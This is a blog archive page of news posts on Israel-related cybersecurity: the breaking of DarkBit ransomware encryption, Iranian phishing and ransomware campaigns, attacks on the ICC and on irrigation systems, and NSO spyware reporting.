Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label Israel. Show all posts
Ransomwares
Cyber Security Cyberattacks DarkBit Encryption Key Iran Israel MuddyWater ransomware attacks Ransomware group Ransomwares

Profero Cracks DarkBit Ransomware Encryption After Israel-Iran Cyberattack Links

 

Cybersecurity company Profero managed to break the encryption scheme used by the DarkBit ransomware group, allowing victims to restore their systems without having to pay a ransom. This achievement came during a 2023 incident response investigation, when Profero was called in to assist a client whose VMware ESXi servers had been locked by the malware. 

The timing of the breach coincided with escalating tensions between Israel and Iran, following drone strikes on an Iranian Defense Ministry weapons facility, raising suspicions that the ransomware attack had political motivations. The attackers behind the campaign claimed to represent DarkBit, a group that had previously posed as pro-Iranian hacktivists and had targeted Israeli universities. Their ransom messages included strong anti-Israel rhetoric and demanded payments amounting to 80 Bitcoin. 

Israel’s National Cyber Command later attributed the operation to MuddyWater, a well-known Iranian state-backed advanced persistent threat group that has a history of conducting espionage and disruption campaigns. Unlike conventional ransomware operators who typically pursue ransom negotiations, the DarkBit actors appeared less concerned with money and more focused on causing business disruption and reputational harm, signaling motivations that aligned with state-directed influence campaigns. 

When the attack was discovered, no publicly available decryptor existed for DarkBit. To overcome this, Profero researchers analyzed the malware in detail and found flaws in its encryption process. DarkBit used AES-128-CBC keys created at runtime, which were then encrypted with RSA-2048 and appended to each locked file. However, the method used to generate encryption keys lacked randomness. By combining this weakness with encryption timestamps gleaned from file modification data, the researchers were able to shrink the possible keyspace to just a few billion combinations—far more manageable than expected. 

The team further capitalized on the fact that Virtual Machine Disk (VMDK) files, common on ESXi servers, include predictable header bytes. Instead of brute forcing an entire file, they only needed to check the first 16 bytes to validate potential keys. Profero built a custom tool capable of generating key and initialization vector pairs, which they tested against these known file headers in a high-powered computing environment. This method successfully produced valid decryption keys that restored locked data. 

At the same time, Profero noticed that DarkBit’s encryption technique was incomplete, leaving many portions of files untouched. Since VMDK files are sparse and contain large amounts of empty space, the ransomware often encrypted irrelevant sections while leaving valuable data intact. By carefully exploring the underlying file systems, the team was able to retrieve essential files directly, without requiring full decryption. This dual approach allowed them to recover critical business data and minimize the impact of the attack.  

Researchers noted that DarkBit’s strategy was flawed, as a data-wiping tool would have been more effective at achieving its disruptive aims than a poorly implemented ransomware variant. The attackers’ refusal to negotiate further reinforced the idea that the campaign was intended to damage operations rather than collect ransom payments. Profero has chosen not to release its custom decryptor to the public, but confirmed that it is prepared to help any future victims affected by the same malware.  

The case illustrates how weaknesses in ransomware design can be turned into opportunities for defense and recovery. It also highlights how cyberattacks tied to international conflicts often blur the line between criminal extortion and state-backed disruption, with groups like DarkBit using the guise of hacktivism to amplify their impact.
Read more »
Technology
DarkBit Encyption Internet Iran Israel Ransomware Technology

Experts decoded encryption keys used by DarkBit ransomware gang

Experts decoded encryption keys used by DarkBit ransomware gang

Encryption key for Darkbit ransomware

Good news for people affected by the DarkBit ransomware: experts from Profero have cracked the encryption process, allowing victims to recover their files for free without paying any ransom.

However, the company has not yet released the decryptor. The National Cyber Directorate from Israel connected the DarkBit ransomware operation to the Iran-nexus cybercriminal gang called “MuddyWater APT.”

How the attack started

After a DarkBit ransomware attack in 2023, Profero encrypted various VMware ESXi servers, which were believed as retaliation for Iranian drone attacks. The threat actors did not negotiate the ransom and emphasized disrupting operations and campaigns to damage the target’s reputation.

The gang posed as pro-Iran hackers and had a history of attacking Israeli agencies. In this incident, the gang asked for 80 Bitcoins and had anti-Israel messages in ransom notes. Profero, however, cracked the encryption, allowing free recovery.

How did the experts find out

While studying DarkBit ransomware, experts discovered that its AES-128-CBC key generation tactic gave weak and predictable keys. Profero used file timestamps and a known VMDK header to limit the keyspace to billions of probabilities, allowing effective brute-force.

“We made use of an AES-128-CBC key-breaking harness to test if our theory was correct, as well as a decryptor which would take an encrypted VMDK and a key and IV pair as input to produce the unencrypted file. The harness ran in a high-performance environment, allowing us to speed through the task as quickly as possible, and after a day of brute-forcing, we were successful!” according to the Profero report. 

Persistent effort led to successful encryption

The experts had proven that it was possible and got the key. They continued brute-forcing another VMDK. This method, however, was not scalable for the following reasons:

  • Each VMDK would require a day for the experts to decrypt
  • The harness resides in an HPC environment and is difficult to scale

“While expensive, it ended up being possible. We decided to once again take a look at any potential weaknesses in the crypto,” Proffero experts said.

The experts made a tool to check all possible seeds and create key and IV pairs to match them against VMDK headers. This allowed them to restore the decryption keys. Profero also leveraged the scarce VMDK files, where most of the content was unencrypted, as the ransom was partially encrypted. The experts then directly recovered the most needed files, avoiding brute-force decryption for most of the data.

Read more »
Russia
Cyber Crime ICC Israel Justice Russia

International Criminal Court Hit by Advanced Cyber Attack, No Major Damage

International Criminal Court Hit by Advanced Cyber Attack, No Major Damage

Swift discovery helped the ICC

Last week, the International Criminal Court (ICC) announced that it had discovered a new advanced and targeted cybersecurity incident. Its response mechanism and prompt discovery helped to contain the attack. 

The ICC did not provide details about the attackers’ intentions, any data leaks, or other compromises. According to the statement, the ICC, which is headquartered in The Hague, the Netherlands, is conducting a threat evaluation after the attack and taking measures to address any injuries. Details about the impact were not provided. 

Collective effort against threat actors

The constant support of nations that have ratified the Rome Statute helps the ICC in ensuring its capacity to enforce its mandate and commitment, a responsibility shared by all States Parties. “The Court considers it essential to inform the public and its States Parties about such incidents as well as efforts to address them, and calls for continued support in the face of such challenges,” ICC said. 

The ICC was founded in 2002 through the Rome Statute, an international treaty, by a coalition of sovereign states, aimed to create an international court that would prosecute individuals for international crimes– war crimes, genocide, terrorism, and crimes against humanity. The ICC works as a separate body from the U.N. International Court of Justice, the latter brings cases against countries but not individuals.

Similar attack in 2023

In 2023, the ICC reported another cybersecurity incident. The attack was said to be an act of espionage and aimed at undermining the Court’s mandate. The incident had caused it to disconnect its system from the internet. 

In the past, the ICC has said that it had experienced increased security concerns as threats against its various elected officials rose. “The evidence available thus far indicates a targeted and sophisticated attack with the objective of espionage. The attack can therefore be interpreted as a serious attempt to undermine the Court's mandate," ICC said. 

The recent notable arrests issued by the ICC include Russian President Vladimir Putin and Israeli Prime Minister Benjamin Netanyahu.

Read more »
Technology
Bitcoin Crypto Israel Startups Technology

Tech Ventures: Israel Advances in Crypto Ecosystem

Tech Ventures: Israel Advances in Crypto Ecosystem

Israel, often known as the "Startup Nation," has emerged as a global leader in cybersecurity, defense, and internet technologies. Cryptocurrency has easily integrated into the high-tech ecosystem, transforming the digital asset class and blockchain technology into key drivers of the country's economic growth. 

Bitcoin ETFs: The Game Changer

In January 2024, when the Securities and Exchange Commission approved various Bitcoin ETFs in the United States, the worldwide crypto market had a 70% price increase, bringing more than $11 billion into the industry. BTC ETF options for US markets were announced in November 2024, resulting in increased retail and institutional investor inflows into the crypto markets. This contributed to the global crypto bull run.  

Blockaid, Ingonyama, Tres, Oobit, and Fordefi are all part of Israel's cryptocurrency ecosystem. In January 2024, Israel had 24 "unicorns". These are private enterprises worth more than $1 billion.  Then there's Starkware, a leader in the Ethereum scaling field, which has reached a $20 billion valuation since the creation of the $STARK token. 

According to a recent yearly assessment, Tel Aviv has the fifth most attractive startup ecosystem in the world. Despite geopolitical uncertainties, the crypto community will undoubtedly increase. These are cryptocurrency enthusiasts, after all.

Israel and Tech Startup Landscape

Israel has traditionally inspired the technology sector, so it was logical that the blockchain would find its place here. The country has a strong emphasis on education, research, and development, as well as a surplus of technical skills. 

They discovered an odd ally in military intelligence who has assisted in the development of tech entrepreneurs and the facilitation of their cryptocurrency investments. Unit 8200 is deeply involved in the cryptocurrency world, and its alumni have joined and established successful firms, bringing government ties, extensive cybersecurity knowledge, and a well-rounded computer education to the blockchain. The Mamram Blockchain Incubator is also associated with the IDF's Centre for Computing and Information Systems.

Tech Revolution in Israel

The Israeli government has contributed to the digital revolution by publicly experimenting with one of the world's first Central Bank Digital Coins. In 2021, the government released the first prototype of the Digital Shekel, and the Bank of Israel recently announced a Digital Shekel Challenge to investigate potential CBDC uses.

The country is also investing in supercomputer technology to compete in the Artificial Intelligence arms race and keep its position at the forefront of the tech start-up scene. 

Read more »
WhatsApp
Cyber Attacks espionage Iran Israel spying surveillance Telegram WhatsApp

Iran Spies on Senior Israeli Officials, Launches Over 200 Cyberattacks

Iran Spies on Senior Israeli Officials, Launches Over 200 Cyberattacks

Shin Bet, an Israeli Cybersecurity Service said recently it discovered over 200 Iranian phishing attempts targeting top Israeli diplomats to get personal information. Shin Bet believes the attacks were launched by Iranian actors through Telegram, WhatsApp, and email. 

The threat actors tried to bait targets into downloading infected apps that would give them access to victim devices and leak personal data like location history and residential addresses.

Iran Targeting Israeli Officials

The targeted senior officials include academicians, politicians, media professionals, and others

ShinBet said the stolen information would be used by Iran to launch attacks against Israeli nationals “through Israeli cells they have recruited within the country.” The targets were reached out with an “individually tailored cover story for each victim according to their area of work, so the approach doesn’t seem suspicious.”

In one case, the attacker disguised as a Cabinet Secretary lured the target saying he wanted to coordinate with PM Benjamin Netanyahu. Shin Bet has tracked the targets involved in the campaign and informed them about the phishing attempts. 

“This is another significant threat in the campaign Iran is waging against Israel, aimed at carrying out assassination attacks. We request heightened awareness, as cyberattacks of this type can be avoided before they happen through awareness, caution, suspicion, and proper preventative behavior online,” said a Shin Bet official.

Reasons for attack

Shin Bet “will continue to act to identify Iranian activity and thwart it in advance.” It believes the motive behind the attacks was to manage future attacks on Israeli nationals using information given by Israeli cells recruited by Iran. The campaign is a sign of an escalation between Iran and Israel, the end goal being assassination attempts.

The bigger picture

The recent discovery of phishing campaigns is part of larger targeted campaigns against Israel. In September 2024, 7 Jewish Israelis were arrested for allegedly spying on IDF and Israeli security figures for Iran. 

The Times of Israel reports, “Also in September, a man from the southern city of Ashkelon was arrested on allegations that he was smuggled into Iran twice, received payment to carry out missions on behalf of Tehran, and was recruited to assassinate either Israel’s prime minister, defense minister, or the head of the Shin Bet.”

Read more »
Technology
Cloud Computing IDF Intelligence Israel Technology

3 Billion Attacks and Counting: The IDF’s Cyber Resilience

3 Billion Attacks and Counting: The IDF’s Cyber Resilience

The Battlefield: Cloud Computing

Cloud computing has become an integral part of modern military operations. The IDF relies heavily on cloud-based systems from troop management to logistics, communication, and intelligence gathering. These systems allow for flexibility, scalability, and efficient resource allocation. 

However, they also make attractive targets for cyber adversaries seeking to disrupt operations, steal sensitive information, or compromise critical infrastructure.

The Israel Defense Forces' cloud computing network has been subjected to almost three billion cyber attacks since the conflict between Israel and Hamas began on October 7, according to the officer in charge of the military's computer section. However, all of the attacks were detected and did not do any damage.

Col. Racheli Dembinsky, chief of the IDF's Center of Computing and Information Systems (Mamram), made the discovery on Wednesday during the "IT for IDF" conference in Rishon Lezion.

According to Dembinsky, the attacks targeted operational cloud computing, which is used by numerous systems that serve troops on the ground during conflict to communicate information and forces' whereabouts.

The Scale of the Threat

Three billion attacks may sound staggering, and indeed it is. These attacks targeted operational cloud computing resources used by troops on the ground during combat. Imagine the strain on the network as thousands of soldiers accessed critical data simultaneously while under fire. Despite this immense pressure, Mamram’s cybersecurity experts managed to fend off every attempt.

Dembinsky did not specify the types of assaults or the level of danger they posed, but she did state that they were all blocked and that no systems were penetrated at any time.

Mamram, the IDF's central computing system unit, is responsible for the infrastructure and defense of the military's remote servers.

Hamas terrorists stormed Israel on October 7, killing over 1,200 people, the majority of them were civilians, and capturing 251. It has also been stated that cyberattacks were launched against Israel on October 7. Dembinsky corroborated this.

The Human Element

While technology played a crucial role, the expertise and dedication of Mamram’s personnel truly made a difference. These cyber warriors worked tirelessly, analyzing attack vectors, identifying vulnerabilities, and devising countermeasures. Their commitment to safeguarding Israel’s digital infrastructure was unwavering.

Since the start of the war, certain cyberattacks have been effective against Israeli civilian computer systems. Iranian-backed hackers targeted the Israel State Archives in November, and it was only recently restored to service. Hackers also successfully targeted the computer systems of the city of Modiin Illit.

The Defense Strategy

Last month, Israel's cyber defense chief, Gaby Portnoy, stated that Iran's cyber attacks have become more active since the commencement of the war, not only against Israel but also against its allies.

Read more »
Ukraine
aviation Bot Traffic Cyber Security Digital era Electronic Data GPS GPS Jamming Israel New York Spoofing Ukraine

GPS Warfare: Ukraine-Israel Tensions Raise Alarms

GPS is used for navigation in almost every device in this age of rapid technological development. Israel may have been involved in recent GPS jamming and spoofing occurrences in Ukraine, according to reports that have revealed a worrying trend. These accidents constitute a serious threat to the worldwide aviation sector and a topic of regional concern. 

The New York Times recently reported on the growing instances of GPS disruptions in Ukraine, shedding light on the potential involvement of Israeli technology. According to the report, Israel has been accused of jamming and spoofing GPS signals in the region, causing disruptions to navigation systems. The motives behind such actions remain unclear, raising questions about the broader implications of electronic warfare on international relations. 

The aviation sector heavily relies on GPS for precise navigation, making any interference with these systems potentially catastrophic. GPS jamming and spoofing not only endanger flight safety but also have the capacity to disrupt air traffic control systems, creating chaos in the skies.

The aviation industry relies heavily on GPS for precision navigation, and any interference with these systems can have dire consequences. GPS jamming and spoofing not only jeopardize the safety of flights but also can potentially disrupt air traffic control systems, leading to chaos in the skies.

The implications of these incidents extend beyond the borders of Ukraine and Israel. As the world becomes increasingly interconnected, disruptions in one region can reverberate globally. The international community must address the issue promptly to prevent further escalations and ensure the safe operation of air travel.

Governments, aviation authorities, and technology experts need to collaborate to develop countermeasures against GPS interference. Strengthening cybersecurity protocols and investing in advanced technologies to detect and mitigate electronic warfare threats should be a priority for nations worldwide.

Preserving vital infrastructure, like GPS systems, becomes crucial as we manoeuvre through the complexity of a networked world. The GPS jamming events between Israel and Ukraine serve as a sobering reminder of the gaps in our technology and the urgent necessity for global cooperation to counter new threats in the digital era.
Read more »
Surveillance Tool
Cybersecurity Hackers Human rights Israel Malicious actor Ransomware Attacks. security measures Spyware Surveillance Tool

Israeli Cyber Firms Unveil Groundbreaking Spyware Tool


Israeli cybersecurity companies have made an unparalleled spyware tool available, which has shocked the whole world's computer sector. This new breakthrough has sparked discussions about the ethics of such sophisticated surveillance equipment as well as worries about privacy and security.

According to a recent article in Haaretz, the Israeli cyber industry has unveiled a cutting-edge spyware tool that has been dubbed InsaneT.This highly advanced technology reportedly possesses capabilities that make it virtually impervious to existing defense mechanisms. As the article states, "Israeli cyber firms have developed an insane new spyware tool, and no defense exists."

The tool's sophistication has caught the attention of experts and cybersecurity professionals worldwide. It has the potential to reshape the landscape of cyber warfare and espionage, making it both a remarkable achievement and a significant cause for concern.

The InsaneT spyware tool's capabilities remain shrouded in secrecy, but it is said to be capable of infiltrating even the most secure networks and devices, bypassing traditional security measures with ease. Its existence highlights the ever-evolving arms race in the world of cybersecurity, where hackers and defenders constantly vie for the upper hand.

While the Israeli cyber industry boasts about this technological breakthrough, ethical concerns loom large. The Register, in their recent report on InsaneT, emphasizes the need for a robust ethical framework in the development and deployment of such powerful surveillance tools. Privacy advocates and human rights organizations have already expressed their apprehension regarding the potential misuse of this technology.

As the world becomes increasingly interconnected, issues related to cyber espionage and surveillance gain prominence. The introduction of InsaneT raises questions about the balance between national security interests and individual privacy rights. Striking the right balance between these two conflicting priorities remains an ongoing challenge for governments and technology companies worldwide.

An important turning point in the history of cybersecurity was the appearance of the spyware tool InsaneT created by Israeli cyber companies. Considering the ethical and security ramifications of such cutting-edge technology, its unmatched capabilities bring both opportunities and risks, highlighting the necessity of ongoing discussion and international cooperation. Governments, corporations, and individuals must manage the complexity of cybersecurity as we advance in the digital era to ensure that innovation does not compromise privacy and security.


Read more »
Ransomware Gang
Cyber Attacks Iran hackers Israel Middle East ransomware attacks Ransomware Gang

Iranian Attackers Employ Novel Moneybird Ransomware to Target Israeli Organizations

 

A new ransomware variant called "Moneybird" is currently being used by the threat actor "Agrius," which is thought to be funded by the Iranian government, to target Israeli organisations.

Since at least 2021, Agrius has been using various identities to deliberately target organisations in Israel and the Middle East while using data wipers in disruptive attacks. 

Researchers from Check Point who found the new ransomware strain believe that Agrius created it to aid in the growth of their activities, and that the threat group's use of "Moneybird" is just another effort to hide their footprints.

Modus operandi

According to Check Point researchers, threat actors first acquire access to company networks by taking advantage of flaws in servers that are visible to the public, giving Agrius its first network footing. 

The hackers then conceal themselves behind Israeli ProtonVPN nodes to launch ASPXSpy webshell variations concealed inside "Certificate" text files, a strategy Agrius has employed in the past. 

After deploying the webshells, the attackers employ open-source tools to move laterally, communicate securely using Plink/PuTTY, steal credentials using ProcDump, and exfiltrate data using FileZilla. These tools include SoftPerfect Network Scanner, Plink/PuTTY, ProcDump, and ProcDump.

The Moneybird ransomware executable is obtained by Agrius in the subsequent stage of the attack through reliable file hosting services like 'ufile.io' and 'easyupload.io.'

The C++ ransomware strain will encrypt target files using AES-256 with GCM (Galois/Counter Mode), creating distinct encryption keys for each file and appending encrypted metadata at their conclusion. This process begins immediately after the target files are launched.

In the instances observed by Check Point, the ransomware only targeted "F:User Shares," a typical shared folder on business networks used to hold company records, databases, and other items pertaining to collaboration.

This focused targeting suggests that Moneybird is more interested in disrupting business than in locking down the affected machines. 

Since the private keys used to encrypt each file are produced using information from the system GUID, file content, file path, and random integers, Check Point argues that data restoration and file decryption would be incredibly difficult.

Following the encryption, ransom notes are left on the affected systems, advising the victim to click the provided link within 24 hours for instructions on data recovery. 

"Hello WE ARE MONEYBIRD! All of your data encrypted! If u want you to restore them follow this link with in 24H," reads the Moneybird ransom note. 

Moneybird is thought to be ransomware, not a wiper, in contrast to earlier assaults connected to Agrius, and it is intended to generate money to support the threat actors' nefarious activities. 

However, in the case observed by Check Point Research, the ransom demand was so high that it was understood from the beginning that a payment would probably not be made, effectively rendering the attack harmful. 

"Yes negotiations could be possible but the demand was extremely high, which leads us to believe that it’s part of the trick. They knew no one would pay so the damage and data leaked was expected. It was not a wiper," stated Eli Smadga, Research Group Manager at Check Point Research.

An easy-to-use but powerful ransomware 

According to Check Point, Moneybird depends on an embedded configuration blob rather than command-line parsing, which would enable victim-specific customizations and increased deployment flexibility.

Because the ransomware's behaviour parameters are pre-defined and difficult to customise for each target or situation, the strain is inappropriate for mass marketing efforts. 

But for Agrius, Moneybird remains a powerful instrument for business disruption, and future advancements that result in the release of newer, more powerful versions may make it a serious danger to a wider variety of Israeli organisations.
Read more »
National Cyber Organizations
Cyber Attacks Irrigation Systems Israel National Cyber Organizations

Upper Galilee Irrigation Systems Crippled by Cyberattack

 


There have been reports of several water monitors malfunctioning on Sunday due to a cyberattack targeting monitoring systems that monitor irrigation systems and wastewater treatment systems. 

It has been found that specific water controllers used to irrigate fields in the Jordan Valley, as well as the Galil Sewage Corporation's sewage control system, were damaged as a result. 

To resolve the issue and restore performance to the systems in both major domains, managers of both major systems pushed their teams to work Sunday morning on the issue. There is no information about the source of the cyberattack. 

Information About Cyberattacks 

It was reported several days earlier that a cyberattack was planned in the region. In the wake of the warning, some farmers turned in their irrigation systems for manual operation instead of remote control and disconnected the remote control option. 

As a result, harm was prevented by the attack. According to a report from Cybersecurity Week, many users who left their systems on remote control had their systems compromised. 

The National Cyber Organization alerted the public last week that anti-Israeli cyber attackers were putting up more attacks throughout Ramadan due to the fasting season. The past week was full of massive cyberattacks against Israeli media organizations, medical websites, government websites, and university websites. There were many holidays observed during this time, including Passover. 

According to Ofer Barnea, chief executive officer of the Upper Galilee Agriculture Company, Israel Hayom reported that three days ago the company was notified of a potential cyber attack. It has been instructed that farmers disconnect the controllers to make contact with them. Someone had not disconnected them this morning, but they insisted they had been disabled since the controllers were still active. The total number of victims is seven. The farmers told the directorate that they could not access their controllers. 

The Israeli Postal Company announced on Sunday that some services would not be available on April 5, the first night of Passover, due to a cyberattack. 

There is a group of hackers who gather every April to participate in Israel. This is a one-day hacking event meant to harm Israel's critical infrastructure and let Israel suffer the damage. 

Several companies and entities are involved in these attacks that are part of an annual event called OPIsrael, a hacking event committed to harming Israel's critical infrastructure every April. 

The Hula Valley region is being targeted by armed bands who target thousands of water monitors. This attack has a direct impact on the physical dimension and, beyond simply causing panic and fear, impacts agricultural areas.
Read more »
User Privacy
FBI Hackers Israel malware NSO Group Pegasus Ransomware Attacks. User Privacy

FBI Nearly Adopted NSO's Spyware

According to a report published by the New York Times on Saturday, several agents from the US Federal Bureau of Investigation worked to enhance the rollout of Pegasus, the notorious phone-hacking program created by Israel's NSO Group. 

What is Pegasus?

Once installed, Pegasus spyware enables the user to fully manage a target's phone, allowing them to see messages, listen in on calls, and access the phone as a remote listening device.

Significant numbers of human rights activists, journalists, politicians, and corporate executives were reportedly designated as potential targets of NSO's Pegasus program, which has caused criticism for the Israeli company responsible for its development. 

When smartphones are infected with Pegasus, they effectively become portable surveillance tools that can be used to read the target's messages, browse through the images, or even switch on the user's camera and microphone secretly.

FBI Purchased Pegasus 

The highly classified files, which were provided to the Times in response to a FOIA request, reveal that agency officials had developed guidelines for federal prosecutors concerning how to disclose Pegasus usage in court proceedings and were progressed in organizing to brief FBI heads on the malware.

Additionally, the FBI asserted that Pegasus had never been used to assist an FBI investigation. The FBI only obtained a restricted license for product testing and evaluation, the statement read "There was no functional use in support of any investigation."

The announcement represents a clear admission by the FBI that it purchased Pegasus, one of the most advanced hacking tools in existence.

The FBI examined NSO's Phantom software, which has the ability to hack US phones, earlier this year, the press reported. After learning that NSO's hackers were linked to violations of human rights all around the world and as negative press about the technology spread, the FBI eventually opted against utilizing it.

The New York Times broke the news of the FBI's acquisition of Pegasus in 2019 while the Trump administration was in control. However, the bureau has still not ruled out the potential of using comparable technology in the future, the report said, citing recent court records.

A legal brief submitted on the bureau's behalf last month stated that "just because the FBI eventually decided not to deploy the tool in support of criminal investigations does not mean it would not test, evaluate, and potentially deploy other similar tools for gaining access to encrypted communications used by criminals."



Read more »
Travel Company
Black Shadow Check Point Cyber Attacks Iranian hackers Israel Travel Company

Iranian Hackers: Israeli Tourism Sites Targeted

A malware targeted websites for the Israeli public transportation companies Dan and Kavim, a children's museum, and a public radio blog. Reportedly, none of the sites were reachable to users by Saturday noon.

On Tuesday, the Sharp Boys hacking group claimed to have stolen data from Israeli travel websites, including ID numbers, addresses, credit card details, and etc.

Websites were compromised 

As per hackers, the affected websites are hotels.co.il, isrotel.com, minihotel.co.il, tivago.co.il, and danhotels.com. Tuesday morning, according to the company, hotels.co.il was inaccessible, however by Tuesday afternoon, the site had loaded. 

"Hello once more! If you don't want your data disclosed by us, contact us as soon as possible," on Friday night, the hackers posted a message on Telegram. A follow-up message stated: "They did not get in touch with us, the first list of data is here " the group said, posting the data online.

Later on Saturday, the gang uploaded what it claimed to be information about customers of the Dan transportation company and a travel agency in a new message that claimed to have more data. "You are under our control no matter where you go, even on your travels. Please keep our name in mind." In an image shared on a Telegram account, Sharp Boys made the statement. 

Everything to know about Sharp Boys cyber gang

According to Israeli media, Sharp Boys is a hacking group with links to Iran that conducts cyber espionage for illicit purposes. 

The Sharp Boys hacker group first appeared in December when it claimed to have affected two Israeli hiking websites. They also claimed to have taken control of the website's backend administration and released a spreadsheet that contained the personal data of 120,000 people. 

In December last year, the group hacked into the Shirbit insurance company in Israel and stole vast volumes of data. When the company declined to pay the $1 million ransom demand, it exposed the data. A spreadsheet that contained personal data and credit card details for 100,000 people was released.

According to a report released on Tuesday by the Israeli cybersecurity firm Check Point, the average weekly number of assaults on businesses in the travel and leisure industry increased globally by 60% in June 2022 compared to the first half of June 2021.
Read more »
Spyware Attack
Apple Cyber Security cybercriminals Israel Pegasus Spyware Attack

An Israeli Spy Agency, QuaDream, Hacks Devices 

 

According to Reuters, an Apple software loop exploited by Israeli spy firm NSO Group to hack access iPhones in 2021 was also targeted by a competitor at the same time. 

The two companies QuaDream got the capacity to remotely hack into iPhones, compromising the smartphones without the user clicking on a malicious link. The fact the two firms employed the same advanced 'zero-click' hacking technique suggests that cellphones are more prone to digital espionage than the industry admits. 

The two organizations utilized ForcedEntry software exploits to steal iPhones. In the context, it's worth noting that an exploit is a piece of computer code that takes advantage of a set of unique software flaws to provide a hacker unauthorized access to data. 

"People want to feel they're safe, and telecommunications companies want the user to assume they're safe," stated Dave Aitel, a cybersecurity partner at Cordyceps Systems. 

Some notable Israelis have been attacked with Pegasus, according to a recent revelation from the Israeli publication Calcalist, including a son of former Prime Minister Benjamin Netanyahu. "CEOs of government ministries, news reporters, tycoons, corporate executives, mayors, social activists, and even the Prime Minister's relatives were all police targets," according to Calcalist. "Phones were hacked by NSO's spyware prior to any research even opening and without any judicial authorization." 

Some of QuaDream's clients overlapped with NSO Group's  implying that the buyers utilized Pegasus and REIGN for surveillance, specifically targeting political opponents. Surprisingly, the two cyberweapon's techniques were so identical when Apple patched the security weakness, it didn't make a difference. 

Spyware firms have long claimed to sell high-powered technologies to assist governments in combating national security threats. Human rights organizations and journalists, on the other hand, have reported the use of spyware to harm civil society, discredit political opposition, and sabotage elections on numerous occasions. 

Pegasus was also recently discovered on the devices of Finland's diplomatic corps working outside the nation, according to Finnish officials, as well as of a wide-ranging espionage campaign. Pegasus was allegedly installed on the iPhones of at least nine US State Department workers.
Read more »
Security Researchers
Cyber Attacks Iranian hackers Israel Security Researchers

Iran-Linked Hackers Attacked Israel's Government and Business Sector

 

In the latest episode of cyberwarfare between the rival states, an Iran-linked hacking gang hit seven Israeli targets in a 24-hour span, according to an Israeli cybersecurity firm. The Israeli "government and business sector" were among the targets of the "Charming Kitten" attack, according to a statement issued late Wednesday by Tel Aviv-based Check Point. 

"Check Point has blocked these attacks, as we witnessed communications between a server used by this group and the targets in Israel," said the firm. "Our reports of the last 48 hours prove that both criminal hacking groups and nation-state actors are engaged in the exploration of this vulnerability."

Charming Kitten, also known as Phosphorous, APT35, Ajax Security Team, ITG18, NewsBeef, and NewsCaster, is a threat actor that has been active since at least 2011 and has targeted entities in the Middle East, the United States, and the United Kingdom. FireEye classified the group as a nation-state-based advanced persistent threat on December 15, 2017, despite its lack of sophistication. Research conducted by FireEye in 2018 suggested that APT35 may be expanding their malware capabilities and intrusion campaigns. Since then, the gang has been known to use phishing to spoof firm websites, as well as false accounts and DNS domains to steal victims' passwords. 

Allegations of cyberwarfare between Iran and Israel have grown more serious in recent months. In October, Israel was implicated in a series of cyberattacks on Iranian infrastructure, including the country's fuel distribution system. The disruption had an unusual impact because it shut down the IT system that allowed Iranians to fill their tanks for free or at reduced prices using a digital card issued by the authorities.

Another reportedly Iran-linked hacker organization, "Black Shadow," claimed responsibility for a cyber-attack on an Israeli internet service provider in October. One of the sites targeted in that incident was Israel's largest LGBTQ dating service, with the hackers demanding ransom payments in exchange for sensitive private information such as the HIV status of the site's users. 

According to the finance ministry, Israel, which prides itself as a cybersecurity leader, hosted a "international cyber financial war game" last week. The United States, Britain, and the United Arab Emirates, which established diplomatic ties with Israel last year, were among those who took part. Germany, Switzerland, and the International Monetary Fund were all present, according to the ministry. Shira Greenberg, a chief economist at Israel's finance ministry, said the exercise underlined "the importance of coordinated global action by governments and central banks in the face of cyber-financial threats."
Read more »
US
Apple Cyber Attacks Hacker Israel Smartphones Spyware US

Israeli Company Spyware Targets US Department Phones

 

According to four individuals familiar with the situation, the iPhones of at least nine U.S. State Department workers had been compromised by an unidentified man using advanced spyware produced by the Israel-based NSO Group. 

The attacks, which occurred in the previous few months, targeted U.S. officials who were either based in Uganda or focused on issues about the East African country, according to two of the sources. 

The attacks, which were first revealed here, are the most extensive known hacks of US officials using NSO technology. Earlier, a database of numbers with prospective targets that included certain American leaders surfaced in NSO reporting, although it was unclear if incursions were always attempted or successful. 

NSO Group stated in a statement that it had no evidence that its tools had been used, but that it had canceled access for the relevant clients and therefore would investigate. 

"If our investigation shall show these actions indeed happened with NSO's tools, such customer will be terminated permanently and legal actions will take place," said an NSO spokesperson, who added that NSO will also "cooperate with any relevant government authority and present the full information we will have." 

NSO has always stated that it exclusively sells its products to government law enforcement and intelligence agencies to assist them in monitoring security concerns and that it is not intimately associated with surveillance operations. 

A State Department official refused to respond to the intrusions and pointed to the Commerce Department's recent decision to place the Israeli corporation on an entity list, making it more difficult for US businesses to do business with them. 

NSO Group and another spyware firm were "added to the Entity List based on a determination that they developed and supplied spyware to foreign governments that used this tool to maliciously target government officials, journalists, business people, activists, academics, and embassy workers," the Commerce Department said in an announcement last month. 

According to product instructions reviewed by Reuters, the NSO application is capable of not just stealing encrypted messages, images, and other confidential material from compromised phones, but also turning them into recording devices to watch their surroundings. 

The developer of the spyware employed in this hack was not named in Apple's advisory to affected consumers. According to two of the people who were alerted by Apple, the victims included American residents who were easily identified as U.S. government officials because they paired email addresses ending in state.gov with their Apple IDs. 

According to the sources, they and other victims alerted by Apple in multiple countries have been affected by the same graphics processing vulnerability. 

The Israeli embassy in Washington stated in a statement that targeting American officials would be a major violation of its norms. 

"Cyber products like the one mentioned are supervised and licensed to be exported to governments only for purposes related to counter-terrorism and severe crimes," an embassy spokesperson said. "The licensing provisions are very clear and if these claims are true, it is a severe violation of these provisions."
Read more »
Security
Candiru Cyber Export Cyber Security Cyber Weapons Government Israel NSO Group Security

Israel Limits Cyberweapons Export List from 102 to 37 Nations

 

The Israeli government has limited the number of nations to which local security businesses can sell surveillance and offensive hacking equipment by nearly two-thirds, reducing the official cyber export list from 102 to 37. 

Only nations with established democracies are included in the new list, which was obtained by Israeli business publication Calcalist earlier today, such as those from Europe and the Five Eyes coalition: 

Australia, Austria, Belgium, Bulgaria, Canada, Croatia, Cyprus, Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Iceland, India, Ireland, Italy, Japan, Latvia, Liechtenstein, Lithuania, Luxembourg, Malta, New Zealand, Norway, Portugal, Romania, Slovakia, Slovenia, South Korea, Spain, Sweden, Switzerland, the Netherlands, the UK, and the US. 

Autocratic regimes, to which Israeli corporations have frequently sold surveillance tools, are strikingly absent from the list. Spyware produced by Israeli businesses such as Candiru and the NSO Group has been attributed to human rights violations in tens of nations in recent years, with local governments using the tools to spy on journalists, activists, dissidents, and political opponents. 

